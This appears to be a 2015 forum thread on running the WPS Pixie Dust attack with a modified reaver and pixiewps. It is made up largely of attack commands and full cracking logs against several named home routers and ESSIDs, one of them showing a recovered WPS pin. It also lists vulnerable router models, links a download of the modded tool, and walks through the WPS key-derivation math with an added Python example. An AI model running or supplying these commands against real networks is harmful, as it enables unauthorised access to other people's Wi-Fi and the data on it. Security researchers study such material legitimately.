@MTeams
Your internal reaver mod version feeds info into pixiewps automatically? (no more cut and paste?)
If the pixie attack works > key; if it fails, brute-force 11,000 pins?
Will release when -pkr added?
Last edited by nuroo; 2015-04-12 at 14:33.
Last edited by t6_x; 2015-05-16 at 11:59.
Thanks t6, just tested it.
Code:
reaver -i mon0 -b 40:70:09:DC:81:F0 -vv -S -K1
+1 for adding pkr to reaver output
Code:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
[+] Waiting for beacon from 40:**:**:**:BA:60
[+] Switching mon0 to channel 1
[+] Associated with 40:**:**:**:BA:60 (ESSID: TG1672G62)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f2:f4:15:6c:59:39:dc:06:18:e9:c9:4f:e0:f3:8a:ad
[P] PKE: dc:1e:5a:f6:6c:b8:98:9f:de:77:66:4e:41:fb:e7:11:b7:02:b7:7c:59:52:11:81:19:32:f0:f7:51:4e:27:8e:57:9a:de:10:f7:b8:5b:1e:fd:aa:6e:06:9e:e1:f1:96:e5:5a:c7:6f:e8:41:f5:ae:4b:11:53:65:59:6f:48:11:07:4c:93:80:c3:bb:ee:9a:e8:af:50:f6:58:fd:97:52:37:30:e9:5b:8a:74:41:54:17:da:7e:ea:5a:8a:9e:bc:f7:40:7e:8d:65:29:f2:6b:21:ee:27:ae:c3:60:42:db:2c:75:2d:72:5e:33:79:7c:3a:5e:55:90:69:a9:2b:92:4d:2f:9a:14:13:1c:f0:f8:92:c6:77:04:eb:03:9c:e6:1f:7b:ea:8b:2b:5e:18:9f:99:49:38:e3:9a:4b:60:09:41:94:83:51:47:1d:b7:d5:1b:4c:51:7a:92:be:77:da:b5:eb:a3:86:7a:dc:84:b9:99:fe:02:2c:5c:44:36:a3
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: c3:ee:01:ef:f3:63:86:49:7e:24:13:54:d1:f0:0d:ff:57:77:12:65:38:34:6f:10:4a:c8:14:95:57:6c:0e:2f
[+] Sending M2 message
[P] E-Hash1: 41:73:b9:eb:ea:74:0f:b1:fd:1a:d1:93:0f:df:37:8e:d7:fe:6c:ee:c2:ec:0f:0d:60:ac:91:4d:04:60:03:ee
[P] E-Hash2: f7:42:2b:e7:13:6f:d0:00:d8:05:72:7d:b6:71:29:c4:10:1f:2f:01:0b:38:b2:9e:7d:99:3f:a7:86:d5:93:85
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: d5:84:7c:94:bb:1c:3e:45:a5:3f:60:b4:a1:2b:a4:9b
[Pixie-Dust] [*] PSK2: 45:68:18:4b:9b:28:45:c9:2a:c8:78:c3:b8:a9:b6:92
[Pixie-Dust] [+] WPS pin: 60919014
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
Awesome!!
Last edited by nuroo; 2015-04-12 at 15:45.
In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.
Shouldn't it check the found pixie pin, to get the passphrase and then end?
Thanks to Wiire and Espresso_Boy, the new modified reaver now prints the PKr for Realtek devices! http://www.mediafire.com/download/or4jj8m8jfek5b4
root@kali:~# reaver -i mon0 -b 00:8E:F2:65:C4:74 -vv
Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[?] Restore previous session for 00:8E:F2:65:C4:74? [n/Y] n
[+] Waiting for beacon from 00:8E:F2:65:C4:74
[+] Switching mon0 to channel 12
[+] Associated with 00:8E:F2:65:C4:74 (ESSID: virginmedia6972489)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 85:a2:64:d7:01:eb:1c:3f:9e:57:18:1e:8c:8d:cd:ec
[P] PKE: 65:af:14:9c:e5:9b:2a:46:5f:a3:c4:e8:8e:ff:70:c4:35 :10:ab:8f:a0:ef:a5:53:d8:14:ee:87:e7:ea:20:b4:27:f 5:9d:b3:77:0f:c0:0b:3d:82:d7:c6:2d:65:84:62:bb:de: dc:9a:9e:f5:a2:6a:8d:94:f4:d2:28:6c:64:80:9c:b3:06 :fe:b5:4f:a0:8b:8d:12:54:97:16:0c:98:87:b4:52:0f:b 4:53:39:b8:72:f8:08:cd:9f:1e:4e:b9:d4:c5:7b:77:69: 84:17:e8:72:81:9c:b0:a7:af:86:92:6c:2f:38:03:7e:d9 :2a:16:31:51:b3:22:22:ed:6b:4c:76:f7:cf:a5:4e:68:9 7:5c:fc:16:2a:a7:13:0e:0d:c2:93:31:3f:08:a3:51:cb: 5c:68:b4:08:b5:90:89:c7:3c:a8:ef:20:dc:4d:b5:54:dc :03:d0:a2:80:ad:35:57:7a:e4:50:1c:a8:6a:eb:f2:d9:8 8:a0:7c:b3:a7:a8:8f:c7:26
[P] WPS Manufacturer: Netgear
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: b8:d9:19:ba:d9:af:20:61:11:4c:7b:6b:03:97:ce:fc:59 :bd:c5:f0:e0:d9:c8:ab:13:10:8e:ef:11:ff:b9:91:2a:6 a:7e:d9:61:6b:61:04:5b:56:ed:8e:d3:38:3a:94:bf:57: 5c:1b:2c:d0:1a:39:ec:53:26:43:62:8d:fc:62:bb:64:0b :b6:ed:4d:96:8d:8d:67:b9:a2:68:21:a5:de:6d:e1:65:2 d:7b:bd:25:95:26:f0:2d:ef:2d:9b:30:57:59:e0:5f:b9: b8:92:7a:03:16:84:3a:c0:cd:ee:56:d9:6f:ba:48:65:7d :9b:cf:72:d0:24:1a:96:c5:db:29:67:cc:4c:d2:58:0c:f 5:75:5c:04:d8:a0:25:05:5e:7a:c9:e9:0f:aa:7f:fc:cf: 42:58:d7:d0:5b:ba:d0:84:c1:f4:62:53:af:02:57:54:8c :f4:7f:26:4b:ca:b2:01:a9:16:f5:7b:38:53:76:c8:a9:9 a:04:6f:be:05:40:87:ac:3e
[P] AuthKey: de:7d:cd:3d:d7:1c:90:ef:7c:bb:f8:01:90:6e:14:08:4a :77:4b:33:88:7b:41:05:85:a7:46:74:14:72:00:ae
[+] Sending M2 message
[P] E-Hash1: db:b9:20:c2:cf:a1:53:55:f2:d0:1a:79:ce:4c:f5:ba:7c :4f:dd:4d:f4:b3:35:ef:86:a3:93:47:00:c1:05:0b
[P] E-Hash2: 97:f5:e9:a1:4e:cd:bf:8f:76:dd:8c:87:1a:30:24:76:8e :0c:56:c1:11:4e:77:89:33:45:c9:f6:66:b9:05:dc
Working well; now to see if it will find the pin, other attempts before said no.
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 7C:4C:A53:84:45
[+] Associated with 7C:4C:A53:84:45 (ESSID: SKYA2FF7)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 04:57:06:96:9a:79:ba:40:c4:98:bb:bd:8f:44:82:84
[P] PKE: 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37
[P] WPS Manufacturer: Broadcom
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb
[P] AuthKey: 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
[+] Sending M2 message
[P] E-Hash1: 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f
[P] E-Hash2: b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a
root@kali:~# pixiewps -e 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37 -r f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb -s 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f -z b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a -a 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
[-] WPS pin not found!
[*] Time taken: 0 s
@soxrok2212
Reaver reports:
Manufacturer: MTT
Model Number: 123456
Wireshark reports:
Manufacturer: MTT
Model Name: MWG3401N
Brand name possibly Zoom? Can't find any info on the chipset used.
Pixiewps attack fails, however the 1st try pin '12345670' gives the passphrase!! Wow
Last edited by nuroo; 2015-04-12 at 17:43.
Probably a really old AP that the manufacturer never fixed.
Vulnerable:
WPS Manufacturer: D-Link
WPS Model Number: DIR-615H1
Chip: Ralink RT3352
E-Nonce: 60:d5:32:46:7f:2c:31:a8:e6:0b:db:5a:5e:06:ce:f8
PKE:ac:21:5b:eb:8d:70:ac:53:81:c7:4d:aa:fc:88:90:3 d:8f:c7:5d:e8:fa:b1:d3:0f:d6:81:bf:d7:a1:0d:23:62: d3:07:77:d6:76:7b:5c:cc:18:f2:13:f3:1f:d2:64:86:87 :67:74:cf:38:db:e4:32:86:92:65:05:9a:8d:a3:eb:79:2 7:60:e6:13:74:d2:3b:92:42:37:e3:bb:3d:29:db:ff:78: 49:27:18:10:ef:bd:a4:ce:57:40:aa:7e:2d:bf:21:51:9f :91:f0:df:e3:d2:89:b5:9f:c1:b6:1c:5c:1e:d9:e3:73:d 4:38:3b:75:2e:e1:c2:63:55:a3:4d:e9:fe:c3:1f:e4:4d: ac:69:fe:9c:d3:37:7a:df:36:89:a3:61:00:92:d2:94:2e :b2:fd:82:84:b8:08:d3:64:ea:28:cd:26:5e:d6:62:a0:8 e:e5:df:f6:5f:2c:0d:28:c8:b6:48:c7:91:d2:e5:b7:d6: bd:c1:f4:7a:e6:be:e1:37:0b:96
AuthKey: 93:94:ad:9a:fd:e1:e4:bc:6e:9b:77:ec:a8:52:de:cb:33 :3f:11:6d:d8:66:b2:d3:01:25:27:b9:9c:1f:91:ed
E-Hash1: 86:31:65:59:bc:4c:4f:6c:55:53:6c:bd:24:82:11:4c:35 :4b:16:ed:b4:f9:b5:d5:b7:6a:d0:7f:be:bd:68:b8
E-Hash2: 4b:f6:32:c3:55:2e:0b:e4:41:68:7b:03:10:74:2b:59:44 :6a:ee:27:d2:93:ca:d0:1a:cb:a1:da:2a:95:c6:9d
NOT VULNERABLE:
Model: WNR1000v3 - Netgear
Chip: Broadcom BCM5356A1
E-Nonce: 5a:bc:44:d6:c7:96:9f:12:4e:e2:0a:c3:b6:b2:cd:53
PKE:e5:4d:f8:60:b2:0c:a4:1e:94:55:46:bf:b5:e6:ba:7 2:0b:52:b5:37:ef:d9:e3:cd:a9:cd:e6:16:c6:b6:d9:d4: 41:47:05:59:aa:3c:b9:e0:2d:89:4b:d1:bd:97:a1:23:a4 :b7:98:48:2b:6e:dd:a1:b2:0c:28:d1:2c:a5:1c:6a:c7:2 6:e2:4d:18:f0:28:2d:1b:35:85:a0:01:1d:2f:1c:09:f6: b0:03:ee:c6:86:ff:dd:8d:84:f1:22:1d:de:2a:ff:9e:b3 :70:95:09:75:85:4a:1a:8a:41:57:7b:8e:e2:60:79:4f:9 1:cc:a2:55:12:73:a5:6c:e3:c5:08:fc:81:9a:1f:18:48: 25:69:f6:d6:6e:d2:1b:c3:d2:7b:87:c1:ee:ab:e6:e3:48 :eb:ed:8c:4f:1a:d1:60:27:b7:88:ed:96:5c:47:5f:b5:a 4:d3:78:0b:20:f7:5b:1e:cf:c0:a0:03:e4:49:f1:57:df: f9:b9:42:85:a0:51:dd:bc:cf:bd
PKR:d8:8d:2f:fe:ca:6a:e6:db:c8:ac:7d:9c:5c:f8:36:6 b:7c:40:d2:56:91:0c:5d:d8:e4:f1:a8:2b:7f:c1:10:98: bf:a2:e3:df:02:a3:86:bb:be:10:a7:00:62:43:41:74:db :15:40:b5:18:42:de:92:e3:15:02:40:63:f2:fa:43:3d:e d:8c:78:e5:bf:40:37:1f:72:78:3a:73:c8:1f:93:9c:13: 18:a4:22:a6:8f:66:7d:c2:43:12:94:6f:92:a4:42:19:b2 :0d:21:b4:23:7b:75:75:f2:99:13:d4:09:76:fb:a7:23:9 3:1b:82:93:91:f6:cf:92:af:15:36:3c:a5:c4:5e:65:95: 10:52:54:dc:74:7b:b9:74:2d:fa:9e:6f:fb:c9:e6:87:a7 :ee:47:31:dc:ae:93:ba:6d:15:13:c9:51:7f:de:8f:f7:c 7:c3:09:86:3d:6b:cd:5e:3a:7d:a7:af:fb:39:82:10:12: 0c:1c:23:f7:16:6b:fe:6c:86:fc
AuthKey: 5a:bf:8b:43:be:0d:e2:12:0d:48:a5:a4:95:7a:e5:31:1d :6a:75:0e:49:7e:6e:fd:18:07:96:c3:7d:21:f8:1e
E-Hash1: 2a:1f:0d:4e:de:29:61:01:a0:86:45:be:34:71:ae:15:3c :58:21:e1:34:77:9b:f7:89:ed:48:07:b8:ee:9e:ac
E-Hash2: 44:31:63:0f:9c:5e:e7:5b:bb:a7:1b:c2:b7:14:35:93:16 :fe:e7:0e:0e:33:85:c3:08:9f:24:a6:8c:dd:68:c7
BTW @soxrok2212: I forgot two digits in the Hitron number; correct is cve30360, not cve360.
@all:
Is there any way to calculate the AuthKey from an existing .pcap with some bash/shell code? I would like to extract the necessary info from the capture file with tshark (for PKR: tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the AuthKey with a bash script.
Thanks, and I forgot in my first post: great work!
I committed a new version on GitHub, but I could not get into the forum to post.
Whenever you need modifications and further improvements, just stay tuned on GitHub.
This week I will post a new tool.
Apparently someone was attacking my account to stop me from logging in to this forum. I do not know the reason for this; I tried to create another account, but it also began to be attacked.
I told the admin and they are already looking for the user responsible for this (someone behind this proxy (167.114.0.xxx)).
Last edited by t6_x; 2015-04-13 at 04:25.
Yeah, it's pretty simple but we haven't done it yet :P The drawback is you need to use small DH keys in reaver to do it manually... and small DH keys don't work for Realtek :P Anyways, all you have to do is make the KDK, or Key Derivation Key:
Code:
KDK = HMAC-SHA-256_DHKey (N1 || EnrolleeMAC || N2)
And then this gives you the AuthKey, KeyWrapKey and the EMSK:
Code:
kdf(key, personalization_string, total_key_bits) :
    result := ""
    iterations = (total_key_bits + prf_digest_size - 1)/prf_digest_size
    for i = 1 to iterations do
        result := result || prf(key, i || personalization_string || total_key_bits)
    return 1st total_key_bits of result and destroy any bits left over
I'm not a coder so I can't do it but I'm sure someone else can.
Last edited by soxrok2212; 2015-04-13 at 22:33.
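The two steps quoted above (KDK, then kdf() into AuthKey || KeyWrapKey || EMSK), as an added worked example that is not code from this thread or from reaver/pixiewps. It takes DHKey (the SHA-256 of the Diffie-Hellman shared secret) as an input, uses the personalization string and 640-bit length from the WSC specification, and parses the colon-separated hex that reaver prints (the earlier question about scripting the AuthKey calculation); every SAMPLE_* value is constructed, not from a real device.

```python
"""WSC (WPS) key derivation: KDK, then AuthKey / KeyWrapKey / EMSK via kdf().

Added example, not code from this thread or from reaver/pixiewps.
    KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)
    AuthKey || KeyWrapKey || EMSK = kdf(KDK, personalization, 640)
DHKey is taken as an input; all SAMPLE_* values below are constructed.
"""
import hashlib
import hmac

# Personalization string and total key length used by the WSC specification.
WSC_PERSONALIZATION = b"Wi-Fi Easy and Secure Key Derivation"
WSC_TOTAL_KEY_BITS = 640            # 256 AuthKey + 128 KeyWrapKey + 256 EMSK
PRF_DIGEST_BITS = 256               # prf() is HMAC-SHA-256


def parse_hex(text: str) -> bytes:
    """Parse reaver-style 'aa:bb:cc' (or bare hex), ignoring the colons and the
    stray spaces/newlines that forum line-wrapping inserts into long values."""
    cleaned = "".join(ch for ch in text if ch not in ": \r\n\t")
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(cleaned)


def wsc_kdk(dhkey: bytes, e_nonce: bytes, enrollee_mac: bytes, r_nonce: bytes) -> bytes:
    """KDK = HMAC-SHA-256 keyed with DHKey over N1 || EnrolleeMAC || N2."""
    if len(dhkey) != 32:
        raise ValueError("DHKey is a SHA-256 digest: 32 bytes")
    if len(e_nonce) != 16 or len(r_nonce) != 16:
        raise ValueError("E-Nonce and R-Nonce are 16 bytes each")
    if len(enrollee_mac) != 6:
        raise ValueError("Enrollee MAC is 6 bytes")
    return hmac.new(dhkey, e_nonce + enrollee_mac + r_nonce, hashlib.sha256).digest()


def wsc_prf(key: bytes, i: int, personalization: bytes = WSC_PERSONALIZATION,
            total_key_bits: int = WSC_TOTAL_KEY_BITS) -> bytes:
    """One prf() block: HMAC-SHA-256(key, i || personalization || total_key_bits),
    with i and total_key_bits encoded as 32-bit big-endian integers."""
    msg = i.to_bytes(4, "big") + personalization + total_key_bits.to_bytes(4, "big")
    return hmac.new(key, msg, hashlib.sha256).digest()


def wsc_kdf(key: bytes, personalization: bytes = WSC_PERSONALIZATION,
            total_key_bits: int = WSC_TOTAL_KEY_BITS) -> bytes:
    """The spec's kdf(): concatenate prf blocks for i = 1..iterations and keep
    only the first total_key_bits bits (640 bits -> 3 blocks, 80 bytes kept)."""
    iterations = (total_key_bits + PRF_DIGEST_BITS - 1) // PRF_DIGEST_BITS
    result = b"".join(wsc_prf(key, i, personalization, total_key_bits)
                      for i in range(1, iterations + 1))
    return result[: total_key_bits // 8]


def derive_wsc_keys(dhkey: bytes, e_nonce: bytes, enrollee_mac: bytes,
                    r_nonce: bytes) -> dict:
    """Full chain: KDK, then split the kdf output into AuthKey | KeyWrapKey | EMSK."""
    kdk = wsc_kdk(dhkey, e_nonce, enrollee_mac, r_nonce)
    material = wsc_kdf(kdk)
    return {
        "KDK": kdk,
        "AuthKey": material[:32],        # 256 bits: keys the Authenticator HMACs
        "KeyWrapKey": material[32:48],   # 128 bits: AES key for encrypted settings
        "EMSK": material[48:80],         # 256 bits
    }


# Constructed sample inputs (recognisable patterns, not taken from any capture).
SAMPLE_DHKEY = bytes(range(32))
SAMPLE_E_NONCE = parse_hex("00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff")
SAMPLE_R_NONCE = parse_hex("ff:ee:dd:cc:bb:aa:99:88:77:66:55:44:33:22:11:00")
SAMPLE_MAC = parse_hex("02:00:00:00:00:01")   # locally administered, made up


def fmt(b: bytes) -> str:
    """Format bytes the way reaver prints them: colon-separated lowercase hex."""
    return ":".join(f"{x:02x}" for x in b)


if __name__ == "__main__":
    keys = derive_wsc_keys(SAMPLE_DHKEY, SAMPLE_E_NONCE, SAMPLE_MAC, SAMPLE_R_NONCE)
    for name in ("KDK", "AuthKey", "KeyWrapKey", "EMSK"):
        print(f"[P] {name}: {fmt(keys[name])}")
```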
Belkin International
F9K1002
WikiDevi: 5 versions, different chipsets.
Pixiewps attack failed though; didn't catch the version number with Wireshark, however.
Hi, thanks for this great information. Keep it up :-). I tried to do it with pixiewps master but I didn't find the PKR key, and I added -S but it didn't work. So I tried PixieScript v2.1 and I got this (thanks):
REAVER TRABAJANDO CON BSSID 18:17:25:2B:E3:50, ESSID TNCAP2BE350 ESPERA 50 s ...
EXTRAYENDO DATOS ...
PKr : 00814f6ea4c9ab9d5d80106f6b8e314768ae728b4214c4698a 02eb9320f41e53f1054e6e137f64b64fec379fed2ce57c04af 39e51ff450908c74df7e6d7df0ec1430dca9841ec83b2e318c 78d8835a8b03c6321af1a168cd2a6383fa6458cce341a45e85 fbad444291e255d1c3204c12df3c8373061b6183f55c8ff458 f68f433334c1c0424fd95756efff233d8087a1d92aa64e92bb 3470ac1625c5308dc1af5839e58a42f35336e3f74a4b18806c f6cc6f054a9700fee1d8a507ce413dc07a
PKe : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b
EHASH1 : 316321fbd0c01cd758a89284fdc4c40bcbbe8f4be95a9d8f2b 22c6504a8d4e70
EHASH2 : c680832b3a6e8afc47ef64147757cfb5d66ad977ea4cfc1dd6 d004563e1f2629
AuthKey: 89299deee5f7a96ff56751a1628d9b9fdcad677af68ceb015d 5249bd7aac13ad
Enrollee Nonce: 6e6e281312d0aa2679a8909435fd7d6f
DATOS AP
========
BSSID: : 18:17:25:2B:E3:50
ESSID: : TNCAP2BE350
Fabricante : Technicolor
Nombre del dispositivo : Router
Version OS : 268435456
Modelo : Technicolor TD5
Numero de modelo : Technicolor TD5
PROBANDO CON PIXIEWPS 1.0 by wiire
[-] WPS pin not found!
[*] Time taken: 1 s
If you already have the WPS PIN through another method, how can you find out the passphrase?
Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
It needs reaver; what must I do to install it?
Thank you
Great!
Vulnerable: Ralink chipsets...
Invulnerable: Realtek chipsets.
Example: RTL8671 EV 2006-27-07 Realtek chipsets are invulnerable...
Some modems use the modem serial number for the WPS PIN.
Example: AirTies modems...
Use the wireshark filter "eapol.type == 0" and they are much easier to find.
Googled my own question.
Display filter for Ethernet type EAPOL.
"eapol.type == 0" or just "eapol"
Capture filter for Ethernet type EAPOL - only saves eapols to hard drive during a capture session, much smaller file size.
"ether proto 0x888e"
Enter without quotes.
Last edited by nuroo; 2015-04-16 at 00:39.
Hello Everyone !
I want first to congratulate you on the great steps you have made with this Pixie Dust exploit.
Also, I have noticed that today, on the WPS Pixie Dust Database, the router Technicolor TD5130 is listed as Vulnerable.
However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".
So I want to know who could perform this exploit, and how (with a full description if possible)?
There is also a TD5130 v3 that I'd love to test on and share with you all.
Thank You !
It would be interesting if you put the output of reaver,
so we can see what chipset it is and other information.
Hi All
A couple more for the database
Technicolor TG-797N v3 Not Vulnerable
TP-LINK TD-W8960N Not Vulnerable
Code:
XX:XX:XX:XX:XX:XX| 6|-70|1.0|No |Telstra9F72A5| Technicolor| 797n v3
OUI: 00-10-18 (Broadcom)
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 41:59:b6:83:3c:ce:53:58:e8:55:5d:b2:2c:b2:87:e7
[P] PKE: 1c:8d:16:a1:5f:08:c2:f0:07:67:b3:24:c9:26:73:c2:ff:b5:c0:3b:39:96:fd:38:b1:d6:de:b7:81:15:63:cb:43:af:f8:21:4f:1d:47:3b:d8:71:e8:17:f6:49:f6:00:31:1c:95:ed:df:76:77:63:48:2b:82:95:e2:b0:bc:c4:41:2c:b5:2b:95:a6:3d:65:3f:3b:11:5d:81:92:2a:9b:65:a2:61:86:39:c7:d0:e0:3d:4c:c9:84:5c:78:b7:87:57:e9:9f:b1:46:97:ca:e0:b6:d2:c7:30:97:7c:a6:36:d6:97:39:fc:93:be:b8:c6:dd:d6:cb:59:b3:b5:e5:0a:94:0b:4a:0c:a8:15:ae:8d:95:dc:f0:95:63:5d:57:2d:34:d6:1d:b9:9e:3e:77:d5:be:c1:1f:a3:3d:55:b8:2b:6d:02:60:a0:a6:44:89:78:e4:a8:a4:56:f8:ee:5b:cb:5f:97:2e:62:a3:0d:21:e3:6a:75:ef:40:d0:db:39:4f
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: 797n v3
[P] WPS Model Serial Number: 1426SARZR
[+] Received M1 message
